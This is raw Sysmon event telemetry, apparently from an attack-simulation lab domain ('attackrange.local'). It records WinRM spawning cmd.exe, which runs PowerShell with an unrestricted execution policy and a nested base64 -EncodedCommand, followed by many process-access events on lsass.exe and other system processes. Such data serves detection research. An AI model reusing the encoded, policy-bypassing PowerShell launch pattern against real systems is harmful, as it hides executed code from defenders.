ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.249{D28789B6-7C64-5FA1-1500-000000008801}13361656C:\Windows\system32\svchost.exe{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.233{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.233{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-B600-000000008801}1252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.224{D28789B6-7CB0-5FA1-B500-000000008801}1744C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.218{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 